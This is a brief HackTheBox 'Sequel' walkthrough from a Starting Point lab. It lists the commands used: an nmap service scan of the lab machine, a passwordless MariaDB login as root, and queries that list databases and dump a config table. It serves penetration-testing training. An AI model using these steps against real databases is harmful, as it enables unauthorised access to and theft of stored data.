HackTheBox – (Starting Point) – Sequel Walkthrough

┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -sC -sV 10.129.95.232

┌──(rootkali)-[/home/kali/Downloads]
└─# mysql -h 10.129.95.232 -u root
MariaDB [(none)]> show databases;

MariaDB [(none)]> use htb;
MariaDB [htb]> show tables;

MariaDB [htb]> select * from config;
